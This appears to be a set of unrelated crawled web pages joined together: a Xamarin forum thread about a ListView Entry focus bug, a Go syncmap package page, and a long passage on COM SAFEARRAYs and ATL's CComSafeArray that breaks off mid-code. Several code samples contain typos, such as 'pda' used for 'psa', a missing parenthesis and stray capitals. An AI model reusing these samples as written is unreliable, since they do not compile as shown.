Hi, I've pasted a sample app below but I essentially have a set of Entries within a ListView, using a class inherited from ViewCell. The error I'm getting is when tapping the Entry. Expected behaviour: Entry comes into focus and keyboard appears Actual Behaviour: Entry flashes, cursor appears briefly and then disappears again. No keyboard activity. public class App { public static Page GetMainPage() { return new NavigationPage(new TestPage()); } } public class TestPage : ContentPage { public TestPage() { var holder = new StackLayout { Orientation = StackOrientation.Vertical, HorizontalOptions = LayoutOptions.FillAndExpand, VerticalOptions = LayoutOptions.Center, Padding = new Thickness(10, 0, 10, 20), }; var listview = new ListView { RowHeight = 150, VerticalOptions = LayoutOptions.Center, ItemsSource = new List<string>{"",""}, ItemTemplate = new DataTemplate(typeof(TestFieldCell)), }; holder.Children.Add(listview); this.Content = holder; } } public class TestFieldCell:ViewCell { protected override void OnBindingContextChanged() { base.OnBindingContextChanged(); View = new Entry(); } } This example app will work fine in forms version 1.2.3.6257, but fails in 1.3.1.6296. Is there something that I'm missing or is this a bug? Thanks in advance, Paul. I afraid I haven't. I've raised a bug for it(), but in the meantime i've had to rollback Xamarin.Forms. Paul. Answers I'm having the same issue. Did you solve your problem? I afraid I haven't. I've raised a bug for it(), but in the meantime i've had to rollback Xamarin.Forms. Paul. Similar problem here. Could not solve it. In my case it does not show anything when trying to tap into the Entry. It looks like it is disabled. Even the workarounds suggested in the guides () and setting WindowSoftInputMode = SoftInput.AdjustPan to the MainActivitiy (like suggested in the knowledge base) did not work. On iOS this works as expected. Our customer wants this to be solved. And I hope I do not have to rollback Xamarin.Forms... Having a similar issue with Entry(s) in a ListView. Any updates on a fix or workaround? It has been fixed. Update to 1.3.5 it will work. not at all. I've reopened a bug with viewcell / grid / entry Hmmmm... I dunno, double checked, definitely working for me. entry/viewcell/listview. My issue has gone away with 1.3.5 ...
https://forums.xamarin.com/discussion/30888/cant-edit-entry-within-listview-forms-1-3-1-error
CC-MAIN-2019-43
en
refinedweb
import "golang.org/x/sync/syncmap" Package syncmap provides a concurrent map implementation. This was the prototype for sync.Map which was added to the standard library's sync package in Go 1.9.. Map is a concurrent map with amortized-constant-time loads, stores, and deletes. It is safe for multiple goroutines to call a Map's methods concurrently. The zero Map is valid and empty. A Map must not be copied after first use. Package syncmap imports 1 packages (graph) and is imported by 178 packages. Updated 2019-10-09. Refresh now. Tools for package owners.
https://godoc.org/golang.org/x/sync/syncmap
CC-MAIN-2019-43
en
refinedweb
IDL provides several attributes for specifying arrays in COM interfaces. Attributes such as [size_is] and [length_is] enable you to adorn method definitions with information required to marshal these arrays across COM boundaries. Yet not all languages support arrays in the same way. For instance, some languages support zero-based arrays, while others require one-based arrays. Still others, such as Visual Basic, allow the application itself to decide whether the arrays it references are zero-based or one-based. Array storage varies from language to language as well: Some languages store elements in row-major order, and others use column-major order. To make the situation even worse, type libraries don't support the IDL attributes needed to marshal C-style IDL arrays; the MIDL compiler silently drops these attributes when generating type libraries. To address the challenges of passing arrays between COM clients in a language-agnostic manner, Automation defines the SAFEARRAY data type. In much the same way as VARIANTs are self-describing generic data types, SAFEARRAYs are self-describing generic arrays. SAFEARRAYs are declared in IDL as follows: interface IMyInterface : IUnknown { HRESULT GetArray([out,retval] SAFEARRAY(VARIANT_BOOL)* myArray); }; The VARIANT_BOOL parameter to the SAFEARRAY declaration indicates the data type of the elements in the SAFEARRAY. This type must be an Automation-compatible type as well, meaning that it must be one of the data types that can be contained in a VARIANT. The MIDL compiler preserves this information in the type library so that clients can discover the underlying type of the SAFEARRAY. The C++ binding for the SAFEARRAY type is actually a struct that represents a self-describing array. It contains a description of the contents of the array, including the upper and lower bounds and the total number of elements in the array. The SAFEARRAY struct is defined in oaidl.h as follows: typedef struct tagSAFEARRAY { USHORT cDims; USHORT fFeatures; ULONG cbElements; ULONG cLocks; PVOID pvData; SAFEARRAYBOUND rgsabound[ 1 ]; } SAFEARRAY; The upper and lower bounds for the SAFEARRAY are stored in the rgsabound array. Each element in this array is a SAFEARRAYBOUND structure. typedef struct tagSAFEARRAYBOUND { ULONG cElements; LONG lLbound; } SAFEARRAYBOUND; The leftmost dimension of the array is contained in rgsabound[0], and the rightmost dimension is in rgsabound[cDims - 1]. For example, an array declared with C-style syntax to have dimensions of [3][4] would have two elements in the rgsabound array. The first element at offset zero would have a cElements value of 3 and an lLbound value of 0; the second element at offset one would have a cElements value of 4 and also an lLbound value of 0. The pvData field of the SAFEARRAY struct points to the actual data in the array. The cbElements array indicates the size of each element. As you can see, this data type is flexible enough to represent an array with an arbitrary number of elements and dimensions. COM provides a number of APIs for managing SAFEARRAYs. These functions enable you to create, access, and destroy SAFEARRAYs of various dimensions and sizes. The following code demonstrates how to use these functions to manipulate two-dimensional SAFEARRAYs of double. The first step is to create an array of SAFEARRAYBOUND structures to indicate the number and size of the array dimensions: SAFEARRAYBOUND rgsabound[2]; rgsabound[0].cElements = 3; rgsabound[0].lLbound = 0; rgsabound[1].cElements = 4; rgsabound[1].lLbound = 0; This code specifies a two-dimensional array with three elements in the first dimension (three rows) and four elements in the second dimension (four columns). This array is then passed to the SafeArrayCreate function to allocate the appropriate amount of storage: SAFEARRAY* psa = ::SafeArrayCreate(VT_R8, 2, rgsabound); The first parameter to this function indicates the data type for the elements of the array. The second parameter specifies the number of elements in the rgsabound array (for example, the number of dimensions). The final parameter is the array of SAFEARRAYBOUND structures describing each dimension of the SAFEARRAY. You can retrieve elements of the SAFEARRAY using the SafeArrayGetElement function, like this: long rgIndices[] = { 2, 1 }; double lElem; ::SafeArrayGetElement(psa, rgIndices, (void*)&lElem); This code retrieves the element stored at location [1][2]that is, the second row, third column. Confusingly, the rgIndices specifies the SAFEARRAY indices in reverse order: The first element of the rgIndices array specifies the rightmost dimension of the SAFEARRAY. You must manually free the SAFEARRAY and the data it contains using the SafeArrayDestroy function. ::SafeArrayDestroy(psa); As you can see, manipulating SAFEARRAYs with these APIs is a bit tedious. Fortunately, ATL provides some relief in the form of a templatized wrapper class called CComSafeArray. This class is defined in atlsafe.h as follows: template <typename T, VARTYPE _vartype = _ATL_AutomationType<T>::type> class CComSafeArray { ... public: LPSAFEARRAY m_psa; } This template class encapsulates a pointer to a SAFEARRAY as its only state. The first template parameter is the C++ type that will be stored in the internal SAFEARRAY. Recall that SAFEARRAYs can hold only Automation-compatible types as elementsthat is, data types that can be stored in a VARIANT. So, the second template parameter to CComSafeArray indicates the VARTYPE of the elements to be stored. Only a subset of the VARIANT-compatible types are supported with CComSafeArray. These are listed in Table 3.1. VARTYPE C++ Type VT_I1 char VT_I2 short VT_I4 int long VT_I8 longlong VT_UI1 byte VT_UI2 ushort VT_UI4 uint ulong VT_UI8 ulonglong VT_R4 float VT_R8 double VT_DECIMAL decimal VT_VARIANT variant VT_CY currency VT_BSTR BSTR VT_DISPATCH IDispatch pointer VT_UNKNOWN IUnknown pointer The documentation indicates that the last three VARTYPEsBSTR, IDispatch, and IUnknown pointersare not supported. The documentation is wrong; CComSafeArray uses template specialization to accommodate the unique semantics of these data types. More on this comes later in this section. The default value for the second template parameter employs a clever combination of templates and macros to automatically associate the C++ data type with the VARTYPE that the SAFEARRAY API functions must use internally. The default parameter value uses the _ATL_AutomationType dummy template, defined as follows: template <typename T> struct _ATL_AutomationType { }; The DEFINE_AUTOMATION_TYPE_FUNCTION macro generates type mappings from the C++ data type to the appropriate VARTYPE. The type enum member holds the VARTYPE that CComSafeArray ultimately will use: #define DEFINE_AUTOMATION_TYPE_FUNCTION(ctype, typewrapper, oleautomationtype) \ template <> \ struct _ATL_AutomationType<ctype> { \ typedef typewrapper _typewrapper;\ enum { type = oleautomationtype }; \ static void* GetT(const T& t) { \ return (void*)&t; \ } \ }; A series of these macros are declared in atlsafe.h to map CComSafeArray-supported types to the appropriate VARTYPE. Note that these macros include as the second macro parameter a typewrapper. This is interesting only for the four supported data types that require special handling: VARIANT, BSTR, IDispatch*, and IUnknown*. DEFINE_AUTOMATION_TYPE_FUNCTION(CHAR, CHAR, VT_I1) DEFINE_AUTOMATION_TYPE_FUNCTION(SHORT, SHORT, VT_I2) DEFINE_AUTOMATION_TYPE_FUNCTION(INT, INT, VT_I4) DEFINE_AUTOMATION_TYPE_FUNCTION(LONG, LONG, VT_I4) DEFINE_AUTOMATION_TYPE_FUNCTION(LONGLONG, LONGLONG, VT_I8) DEFINE_AUTOMATION_TYPE_FUNCTION(BYTE, BYTE, VT_UI1) DEFINE_AUTOMATION_TYPE_FUNCTION(USHORT, USHORT, VT_UI2) DEFINE_AUTOMATION_TYPE_FUNCTION(UINT, UINT, VT_UI4 DEFINE_AUTOMATION_TYPE_FUNCTION(ULONG, ULONG, VT_UI4) DEFINE_AUTOMATION_TYPE_FUNCTION(ULONGLONG, ULONGLONG, VT_UI8) DEFINE_AUTOMATION_TYPE_FUNCTION(FLOAT, FLOAT, VT_R4) DEFINE_AUTOMATION_TYPE_FUNCTION(DOUBLE, DOUBLE, VT_R8) DEFINE_AUTOMATION_TYPE_FUNCTION(DECIMAL, DECIMAL, VT_DECIMAL) DEFINE_AUTOMATION_TYPE_FUNCTION(VARIANT, CComVariant, VT_VARIANT) DEFINE_AUTOMATION_TYPE_FUNCTION(CY, CY, VT_CY) With these definitions in hand, declaring an instance of CComSafeArray<long> would generate a second parameter of _ATL_Automation_Type<long>::type, where the exposed type member is equal to VT_I4. The template parameter you pass to CComSafeArray establishes only the data type of the SAFEARRAY elements, not the number of dimensions or the size of each dimension. This information is established through one of the seven CComSafeArray constructors. The first constructor is the default (parameterless) constructor and simply initializes m_psa to NULL. Three other constructors create a new CComSafeArray instance from dimension and size information. The first of these constructors creates a one-dimensional array with ulCount elements and is indexed starting with lLBound: explicit CComSafeArray(ULONG ulCount, LONG lLBound = 0); Internally, this constructor uses these arguments to create an instance of a class that serves as a thin wrapper for the SAFEARRAYBOUND structure discussed earlier. The CComSafeArrayBound class exposes simple methods for manipulating the number of elements in a particular CComSafeArray dimension, as well as the starting index (lower bound) for that dimension. Note that this class derives directly from the SAFEARRAYBOUND structure, so it can be passed to methods that expect either a CComSafeArrayBound class or a SAFEARRAYBOUND structure. class CComSafeArrayBound : public SAFEARRAYBOUND { CComSafeArrayBound(ULONG ulCount = 0, LONG lLowerBound = 0) { ... } CComSafeArrayBound& operator=(const CComSafeArrayBound& bound) { ... } CComSafeArrayBound& operator=(ULONG ulCount) { ... } ULONG GetCount() const { ... } ULONG SetCount(ULONG ulCount) { ... } LONG GetLowerBound() const { ... } LONG SetLowerBound(LONG lLowerBound) { ... } LONG GetUpperBound() const { ... } }; A quick look at the implementation for the CComSafeArray(ULONG, LONG) constructor demonstrates how all the nondefault constructors use the CComSafeArrayBound wrapper class: explicit CComSafeArray(ULONG ulCount, LONG lLBound = 0) : m_psa(NULL) { CComSafeArrayBound bound(ulCount, lLBound); HRESULT hRes = Create(&bound); if (FAILED(hRes)) AtlThrow(hRes); } An instance of CComSafeArrayBound is created and passed to the Create member function, which is itself a thin wrapper over the SAFEARRAY API functions. As shown in the following code fragment, Create uses the SafeArrayCreate API to support building a SAFEARRAY with any number of dimensions: HRESULT Create(const SAFEARRAYBOUND *pBound, UINT uDims = 1) { ATLASSERT(m_psa == NULL); ATLASSERT(uDims > 0); HRESULT hRes = S_OK; m_psa = SafeArrayCreate(_vartype, uDims, const_cast<LPSAFEARRAYBOUND>(pBound)); if (NULL == m_psa) hRes = E_OUTOFMEMORY; else hRes = Lock(); return hRes; } This first constructor just shown is probably the most frequently used. One-dimensional SAFEARRAYs are much more common than multidimensional SAFEARRAYs, and C++ developers are accustomed to zero-based array indexing. You make use of this simple constructor with code such as the following: // create a 1-D zero-based SAFEARRAY of long with 10 elements CComSafeArray<long> sa(10); // create a 1-D one-based SAFEARRAY of double with 5 elements CComSafeArray<double> sa(5,1); The second CComSafeArray constructor enables you to pass in a SAFEARRAYBOUND structure or a CComSafeArrayBound instance: explicit CComSafeArray(const SAFEARRAYBOUND& bound); This constructor is invoked when you write code similar to the following: CComSafeArrayBound bound(5,1); // 1-D one-based array CComSafeArray<long> sa(bound); This constructor is arguably less useful and less succinct than passing the bounds information directly via the first constructor shown. You use the third constructor to create a multidimensional SAFEARRAY. This constructor accepts an array of SAFEARRAYBOUND structures or CSafeArrayBound instances, along with a UINT parameter to indicate the number of dimensions: explicit CComSafeArray(const SAFEARRAYBOUND *pBound, UINT uDims = 1); You create a multidimensional CComSafeArray with this constructor as follows: // 3-D array with all dimensions // left-most dimension has 3 elements CComSafeArrayBound bound1(3); // middle dimension has 4 elements CComSafeArrayBound bound2(4); // right-most dimension has 5 elements CComSafeArrayBound bound3(5); // equivalent C-style array indices would be [3][4][5] CComSafeArrayBound rgBounds[] = { bound1, bound2, bound3 }; CComSafeArray<int> sa(rgBounds, 3); Note that nothing prevents you from creating different starting indices for the different dimensions of the SAFEARRAYnothing but your conscience that is. This would be extraordinarily confusing for any code that uses this type. In any event, as mentioned previously, multidimensional SAFEARRAYs are pretty rare creatures in reality, so we won't belabor the point. The remaining three CComSafeArray constructors create an instance from an existing SAFEARRAY or CComSafeArray. They are declared as follows: CComSafeArray(const SAFEARRAY *psaSrc) : m_psa(NULL); CComSafeArray(const SAFEARRAY& saSrc) : m_psa(NULL); CComSafeArray(const CComSafeArray& saSrc) : m_psa(NULL); All three constructors do the same thing: check for a NULL source and delegate to the CopyFrom method to duplicate the contents of the source instance. CopyFrom accepts a SAFEARRAY* and CComSafeArray provides a SAFEARRAY* cast operator, so the third constructor delegates to the CopyFrom method as well. This produces a clone of the source array. The following code demonstrates how it instantiates a CComSafeArray from an existing instance: CComSafeArray<int> saSrc(5); // source is 1-D array of 5 ints // allocate storage for 1-D array of 5 ints // and copy contents of source CComSafeArray<int> saDest(saSrc); The destructor for CComSafeArray is quite simple as well. It automatically releases the resources allocated for the SAFEARRAY when the instance goes out of scope. The implementation simply delegates to the Destroy method, which is defined as follows: HRESULT Destroy() { HRESULT hRes = S_OK; if (m_psa != NULL) { hRes = Unlock(); if (SUCCEEDED(hRes)) { hRes = SafeArrayDestroy(m_psa); if (SUCCEEDED(hRes)) m_psa = NULL; } } return hRes; } The Destroy method first calls Unlock to decrement the lock count on the internal SAFEARRAY and then simply delegates to the SafeArrayDestroy method. The significance of lock counting SAFEARRAYs is discussed shortly. CComSafeArray defines two assignment operators. Both duplicate the contents of the right-side instance, clearing the contents of the left-side instance beforehand. These operators are defined as follows: CComSafeArray<T>& operator=(const CComSafeArray& saSrc) { *this = saSrc.m_psa; return *this; } CComSafeArray<T>& operator=(const SAFEARRAY *psaSrc) { ATLASSERT(psaSrc != NULL); HRESULT hRes = CopyFrom(psaSrc); if (FAILED(hRes)) AtlThrow(hRes); return *this; } The assignment statement in the first line of the first operator delegates immediately to the second operator that accepts a SAFEARRAY* parameter. CopyFrom clears the contents of the destination SAFEARRAY by eventually calling SafeArrayDestroy to free resources allocated when the target SAFEARRAY was created. This code gets invoked with code such as the following: CComSafeArray<long> sa1(10); // do something interesting with sa1 CComSafeArray<long> sa2(5); // free contents of sa1, duplicate contents // of sa2 and put into sa1 sa1 = sa2; As with the CComVariant and CComBSTR classes discussed earlier, the CComSafeArray class wraps a data type that must be carefully managed if resource leaks are to be avoided. The storage allocated for the encapsulated SAFEARRAY must be explicitly created and freed using the SAFEARRAY API functions. In fact, two chunks of memory must be managed: the SAFEARRAY structure itself and the actual data contained in the SAFEARRAY. Just as with CComVariant and CComBSTR, the CComSafeArray class provides Attach and Detach methods to wrap a preallocated SAFEARRAY: HRESULT Attach(const SAFEARRAY *psaSrc) { ATLENSURE_THROW(psaSrc != NULL, E_INVALIDARG); VARTYPE vt; HRESULT hRes = ::ATL::AtlSafeArrayGetActualVartype( const_cast<LPSAFEARRAY>(psaSrc), &vt); ATLENSURE_SUCCEEDED(hRes); ATLENSURE_THROW(vt == GetType(), E_INVALIDARG); hRes = Destroy(); m_psa = const_cast<LPSAFEARRAY>(psaSrc); hRes = Lock(); return hRes; } LPSAFEARRAY Detach() { Unlock(); LPSAFEARRAY pTemp = m_psa; m_psa = NULL; return pTemp; } The Attach operation first checks to see if the type contained in the SAFEARRAY being attached matches the type passed as a template parameter. If the type is correct, the method next releases its reference to the encapsulated SAFEARRAY by calling Destroy. We glossed over the Destroy method when we presented it previously, but you'll note that the first thing Destroy did was call the CComSafeArray's Unlock method. The lock count in the SAFEARRAY structure is an interesting historical leftover. Back in the days of 16-bit Windows, the OS couldn't rely on having a virtual memory manager. Every chunk of memory was dealt with as a direct physical pointer. To fit into that wonderful world of 640KB, memory management required an extra level of indirection. The GlobalAlloc API function that's still with us is an example. When you allocate memory via GlobalAlloc, you don't get an actual pointer back. Instead, you get an HGLOBAL. To get the actual pointer, you call GlobalLock and pass it the HGLOBAL. When you're done working with the pointer, you call GlobalUnlock. This doesn't actually free the memory; if you call GlobalLock again on the same HGLOBAL, your data will still be there, but on 16-bit Windows the pointer you got back could be different. While the block is unlocked, the OS is free to change the physical address where the block lives by copying the contents. Today, of course, the virtual memory managers inside modern CPUs handle all this. Still, some vestiges of those old days remain. The SAFEARRAY is one of those vestiges. You are not allowed to do this to access a SAFEARRAY's data: SAFEARRAY *psa = ::SafeArrayCreateVector(VT_I4, 0, 10); // BAD - this pointer may not be valid! int *pData = reinterpret_cast<int *>(pda->pvData); // BOOM (maybe) pData[0] = 5; Instead, you need to first lock the SAFEARRAY: SAFEARRAY *psa = ::SafeArrayCreateVector(VT_I4, 0, 10); // GOOD - this will allocate the actual storage for the data ::SafeArrayLock(psa); // Now the pointer is valid int *pData = ( int * )(pda->pvData); pData[0] = 5; // Unlock after we're done ::SafeArrayUnlock( psa ); Locking the SAFEARRAY actually allocates the storage for the data if it doesn't already exist and sets the pvData field of the SAFEARRAY structure. Several different APIs perform this function. You can't just do psa->cLocks++; you must call an appropriate API function. In the bad old days, it was important that handles got unlocked as quickly as possible; if they didn't, the OS couldn't move memory around and eventually everything ground to a halt as memory fragmentation grew. These days, there's no need to worry about unlocking, but the API remains. So, the CComSafeArray takes a simple approach: It locks the data as soon as it gets the SAFEARRAY and doesn't unlock it until the SAFEARRAY is either Destroyed or Detached. You usually use Attach inside a method implementation to wrap a SAFEARRAY that has been passed to you: STDMETHODIMP SomeClass::AverageArray(/* [in] */ SAFEARRAY* psa, /* [out] */ LONG* plAvg) { if (!plAvg) return E_POINTER; CComSafeArray<long> sa; // Note: no type check is done // against psa type sa.Attach(psa); // we're pointing at the same // memory as psa ... perform some calculations sa.Detach(); // Must detach here or risk a crash return S_OK; } When you want to return a SAFERRAY from a method call, turn to the Detach operation, as in the following example: STDMETHODIMP SomeClass::get_Array(/* [out] */ SAFEARRAY** ppsa) { if (!ppsa) return E_POINTER; CComSafeArray<long> sa(10); ... populate sa instance // no resources released when we leave scope // and no copying performed *ppsa = sa.Detach(); return S_OK; } Attach and Detach don't do any copying of the SAFEARRAY, and with the lock count in place, you might be tempted to think of the lock count as a kind of reference counting. Unfortunately, ATL 8 has a bug in the implementation of the Destroy method that makes this use of CComSafeArray problematic. Consider this code sample: STDMETHODIMP SomeClass::DontDoThis(SAFEARRAY* psa) { // We have two references to the safearray CComSafeArray<long> sa1, sa2; sa1.Attach(psa); sa2.Attach(psa); // manipulate the array here // BUG: Don't do this sa2.Destroy( ); } The explicit call to sa2.Destroy() will not actually destroy the underlying SAFEARRAY; this makes sense because there are still outstanding references (and locks) on the underlying data structure. It did, however, call Unlock(). Here's the bug: Even though Destroy was called, sa2 thinks that it's holding on to a valid reference to a SAFEARRAY. As a result, the destructor of sa2 calls Destroy() again, resulting in too many calls to Unlock(). The results afterward are potentially not pretty. To avoid this bug, when you're using CComSafeArray, never Attach multiple CComSafeArray objects to the same SAFEARRAY pointer. Several methods are provided for retrieving information about the size and shape of a CComSafeArray instance: LONG GetLowerBound(UINT uDim = 0) const; LONG GetUpperBound(UINT uDim = 0) const; ULONG GetCount(UINT uDim = 0) const; UINT GetDimensions() const; VARTYPE GetType() const ; bool IsSizable() const; All these methods are fairly simple and self-explanatory. GetLowerBound and GetUpperBound return the lower and upper bounds of a particular dimension of the SAFEARRAY. The GetCount method takes a specific dimension number and returns the number of elements in that dimension. GeTDimensions returns the total number of dimensions in the SAFEARRAY, also known as the array rank. You can query the Automation VARTYPE with the GetType method. IsSizable indicates whether the SAFEARRAY can be resized. Recall that the definition of the SAFEARRAY data type included an fFeatures bit field that stores information about how the array is allocated. typedef struct tagSAFEARRAY { ... USHORT fFeatures; ... } SAFEARRAY; The SAFEARRAY API functions use this information to properly release elements when the SAFEARRAY is destroyed. The FADF_FIXEDSIZE bit indicates whether the SAFEARRAY can be resized. By default, the SAFEARRAY created with an instance of CComSafeArray is resizable, so the IsSizable method returns trUE. CComSafeArray doesn't expose any methods for directly manipulating the fFeatures flags, so they would change from their default values only if you directly access the encapsulated SAFEARRAY, if the SAFEARRAY passed to the CComSafeArray constructor has different values, or if an Attach is performed on a SAFEARRAY that manipulated the fFeatures field. You can access the internal SAFEARRAY directly with the GetSafeArrayPtr method: LPSAFEARRAY* GetSafeArrayPtr() { return &m_psa; } If a CComSafeArray instance is resizable, clients can use two different Resize methods to grow or shrink a SAFEARRAY: HRESULT Resize(ULONG ulCount, LONG lLBound = 0); HRESULT Resize(const SAFEARRAYBOUND *pBound); The first version takes the new number of elements and lower bound, constructs a SAFEARRAYBOUND structure from the supplied parameters, and delegates the real work to the second version that accepts a SAFEARRAYBOUND* parameter. This second version of Resize first verifies that the SAFEARRAY is resizable and then relies upon the SAFEARRAY API SafeArrayRedim to do the heavy lifting. The first thing to note is that only the least-significant (rightmost) dimension of a SAFEARRAY can be resized. So, you can change the size of a SAFEARRAY with dimensions [3][5][7] to one with dimensions [3][5][4], but you cannot change it to have dimensions [6][5][7]. If the resizing operation reduces the size of the SAFEARRAY, SafeArrayRedim deallocates the elements beyond the new bounds. If the operation increases the size of the SAFEARRAY, SafeArrayRedim allocates and initializes the appropriate number of new elements. Be warned, there's a nasty bug in the implementation of the Resize method: HRESULT Resize(const SAFEARRAYBOUND *pBound) { ATLASSUME(m_psa != NULL); ATLASSERT(pBound != NULL); if (!IsSizable()) { return E_FAIL; } HRESULT hRes = Unlock(); if (SUCCEEDED(hRes)) { hRes = SafeArrayRedim(m_psa, const_cast<LPSAFEARRAYBOUND>(pBound)); if (SUCCEEDED(hRes)) { hRes = Lock(); } } return hRes; } If the underlying call to SafeArrayRedim fails, the call to relock the SAFEARRAY is never made. When that happens, everything falls apart, and the destructor might even fail. If you call Resize, be very careful to check the return HRESULT. If it's a failure, you really can't assume anything about the state of the encapsulated SAFEARRAY. The best bet is to Detach it and clean up manually. Microsoft has agreed that this is a bug but was unable to fix it in time for the Visual Studio 2005 release. Hopefully, it'll be officially fixed soon. CComSafeArray also provides three useful Add functions that you can use to append elements in a SAFEARRAY to the end of an existing CComSafeArray instance. Note that these methods work for only one-dimensional SAFEARRAYs. All three versions will assert if the Add method is invoked on a CComSafeArray instance that contains a multidimensional SAFEARRAY. HRESULT Add(const T& t, BOOL bCopy = TRUE); HRESULT Add(ULONG ulCount, const T *pT, BOOL bCopy = TRUE); HRESULT Add(const SAFEARRAY *psaSrc); The first version of Add tacks on a single element to the end of the SAFEARRAY. If the SAFEARRAY is NULL, Add first invokes the Create method to allocate an empty SAFEARRY. Resize then increases the size of the SAFEARRAY by one, and the SetAt method is called to insert the value of the t parameter into the last element of the SAFEARRAY. The bCopy parameter is discussed further in a moment when we examine the CComSafeArray accessors: SetAt and GetAt. For now, simply understand that this parameter controls whether the CComSafeArray is appended with an independent duplicate of the new item or whether it actually takes ownership of the item. The second version of Add accepts a count and an array of items to append. It works similar to the single-element version: First, it creates an empty SAFEARRAY, if necessary; then, it calls Resize to grow the SAFEARRAY by ulCount elements. SetAt is invoked within a loop to initialize the new SAFEARRAY elements with the value of the items supplied in the pT parameter. Finally, the third version of Add accepts a pointer to a SAFEARRAY and appends all elements that it contains to the end of the CComSafeArray instance. This version of Add relies upon Resize and SetAt to do its work in exactly the same manner as do the other two versions. Here's how you might use these methods in your own code: CComSafeArray<int> sa; // sa::m_psa is NULL sa.Add(7); // sa allocated and now contains { 7 } int rgVal[] = { 8, 9 }; sa.Add(2, rgVal); // sa now contains { 7, 8, 9 } sa.Add(sa); // sa now contains { 7, 8, 9, 7, 8, 9 } // see discussion of cast operators to // understand what makes this line work Warning: The various Add overloads call the Resize method under the hood, so they're subject to the same buggy behavior if Resize fails. CComSafeArray provides five methods for reading and writing individual elements of the encapsulated SAFEARRAY. Three of these methods are used for accessing one-dimensional SAFEARRAYs. The GetAt method comes in two flavors. const typename _ATL_AutomationType<T>::_typewrapper& GetAt(LONG lIndex) const { ATLASSUME(m_psa != NULL); if(m_psa == NULL) AtlThrow(E_FAIL); LONG lLBound = GetLowerBound(); ATLASSERT(lIndex >= lLBound); ATLASSERT(lIndex <= GetUpperBound()); if ((lIndex < lLBound) || (lIndex > GetUpperBound())) AtlThrow(E_INVALIDARG); return ( (_ATL_AutomationType<T>::_typewrapper*) m_psa->pvData )[lIndex-lLBound]; } _ATL_AutomationType<T>::_typewrapper& GetAt(LONG lIndex) { // code identical to const version } The two GetAt methods differ only in that the first version uses the const qualifier to enforce read-only semantics for the accessed element. The methods retrieve the upper and lower bounds and validate the specified index against these bounds. Note that the lIndex passed in is the index relative to the lLBound defined for the CComSafeArray instance, which might or might not be zero. To retrieve the requested element, the pvData field of the encapsulated SAFEARRAY is cast to the element type; conventional C-style pointer arithmetic does the rest. At this point, it's worth examining the significance of the _typewrapper field of the _ATL_AutomationType template class presented earlier. Recall that a series of DEFINE_AUTOMATION_TYPE_FUNCTION macros associated the supported C++ data types with both their corresponding Automation VARTYPE as well as a wrapper class. Only one DEFINE_AUTOMATION_TYPE_FUNCTION macro actually supplied a real wrapper class for the C++ data typeall the others shown so far simply use the actual C++ type as the wrapper type. The one macro mapped the VARIANT data type to the CComVariant wrapper class and to a VARTYPE value of VT_VARIANT. This internally sets _typewrapper to CComVariant and allows CComSafeArray to both leverage the convenient semantics of CComVariant in its internal implementation and return CComVariant elements of the SAFEARRAY to the client. Using a wrapper class in the typecasting code within GetAt relies upon the fact that CComVariant holds the encapsulated VARIANT as its only state, as discussed in the previous section on the CComVariant class. An instance of CComVariant resides at precisely the same memory address and occupies precisely the same storage as the encapsulated VARIANT. So, CComSafeArray can seamlessly deal in terms of the _typewrapper type internally and expose the wrapper type to the client as a convenience. Note that wrapper classes for element types must hold the encapsulated type as their only state if this scheme is to work correctly. You'll see in a moment that the GetAt method isn't the only method that breaks down if this isn't the case. The list of DEFINE_AUTOMATION_TYPE_FUNCTION macros didn't generate type mappings support for two other important SAFEARRAY element types that CComSafeArray actually supports, even though the current ATL documentation doesn't mention them. Instead of macros, CComSafeArray provides support for elements of type BSTR, IDispatch*, and IUnknown* tHRough template specialization. The template specialization for all three data types looks very similar; we examine the one for BSTR as an example because you're already familiar with the associated wrapper class: CComBSTR. The wrapper class for IDispatch* and IUnknown* is CComPtr, presented in detail in the later section "The CComPtr and CComQIPtr Smart Pointer Classes." The specialization for BSTR fills the role of the DEFINE_AUTOMATION_TYPE_FUNCTION macro, in that it sets the _typewrapper member of _ATL_AutomationType to the CComBSTR wrapper class and sets the type member to VT_BSTR, as you can see in the following code: template <> struct _ATL_AutomationType<BSTR> { typedef CComBSTR _typewrapper ; enum { type = VT_BSTR}; static void* GetT(const BSTR& t) { return t; } }; Similarly, the specialization for IDispatch* sets type to VT_DISPATCH and _typewrapper to CComPtr; the one for IUnknown* sets type to VT_UNKNOWN and _typewrapper to CComPtr. You should recall that, like CComVariant, CComBSTR holds in its m_str member the encapsulated BSTR as its only state. Thus, the code shown previously in the GetAt method works fine for CComSafeArrays that contain BSTR elements. Also note that the specialization shown earlier defines the GetT method differently than the other supported data types. This method is only used by the element accessor functions for multidimensional SAFEARRAYs, in which a void* pointer to the destination buffer must be provided to the SafeArrayGetElement API. The GetT implementation that the DEFINE_AUTOMATION_TYPE_FUNCTION macro generates for all the other data types returns the address of the encapsulated data. In the case of a BSTR, the data type is already a pointer to the data, so GetT is specialized to return the encapsulated type itself instead of a pointer to the encapsulated type. The specializations for IDispatch* and IUnknown* implement GetT in precisely the same way as well because they are also inherently pointer types. CComSafeArray provides the SetAt method for writing to specific elements. The method is defined as follows: HRESULT SetAt(LONG lIndex, const T& t, BOOL bCopy = TRUE) { bCopy; ATLASSERT(m_psa != NULL); LONG lLBound = GetLowerBound(); ATLASSERT(lIndex >= lLBound); ATLASSERT(lIndex <= GetUpperBound()); ((T*)m_psa->pvData)[lIndex-lLBound] = t; return S_OK; } SetAt first ensures that the encapsulated SAFEARRAY is non-NULL and then validates the index passed in against the upper and lower bounds defined for the SAFEARRAY. The assignment statement copies the element data provided into the appropriate location in the encapsulated SAFEARRAY. Assigning a new value to a SAFEARRAY element is accomplished with code like the following: CComSafeArray<long> sa(5); long lNewVal = 14; // replace the 4th element with the value 14 sa.SetAt(3, lNewVal); The relevance of the bCopy parameter becomes evident only when you turn to the four specializations of the SetAt parameter that are provided for SAFEARRAYs: BSTR, VARIANT, IDispatch*, and IUnknown*. Each of these data types requires special handling when performing assignment, so CComSafeArray specializes SetAt to enforce the correct semantics. The specialization for BSTR first uses SysFreeString to clear the existing element in the array and then assigns it either to a copy of the provided BSTR or to the BSTR parameter itself, depending on the value of the bCopy parameter. template<> HRESULT CComSafeArray<BSTR>::SetAt(LONG lIndex, const BSTR& strData, BOOL bCopy) { // validation code omitted for clarity BSTR strOrg = ((BSTR*)m_psa->pvData)[lIndex-lLBound]; if (strOrg) ::SysFreeString(strOrg); if (bCopy) { BSTR strTemp = ::SysAllocString(strData); if (NULL == strTemp) return E_OUTOFMEMORY; ((BSTR*)m_psa->pvData)[lIndex-lLBound] = strTemp; } else ((BSTR*)m_psa->pvData)[lIndex-lLBound] = strData; 